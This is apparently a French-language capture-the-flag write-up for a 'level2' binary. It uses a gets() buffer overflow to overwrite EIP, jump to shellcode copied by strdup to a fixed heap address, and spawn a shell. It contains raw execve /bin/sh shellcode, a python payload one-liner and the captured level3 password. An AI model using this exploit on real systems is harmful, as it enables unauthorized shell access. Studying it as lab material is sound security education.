https://www.coengoedegebure.com/buffer-overflow-attacks-explained/

gets cree un overflow qui nous permet de change le eip de la fonction et de le faire pointe sur le contenu lu par gets et copie dans la heap par strdup, pour execute des instructions qui lance un shell

nasm -f elf shellcode.asm

shellcode to execute
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

l'address 0x0804a008 de strdup est toujour la meme

python -c 'print "\x90"*10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "B"*41 + "\x38\xf6\xff\xbf" + "\x08\xa0\x04\x08"' > /tmp/level2_overflow

$ cat /tmp/level2_overflow - | ./level2
...
cat /home/user/level3/.pass
492deb0e7d14c4b5695173cca843c4384fe52d0857c2b0718e1a521a4d33ec02
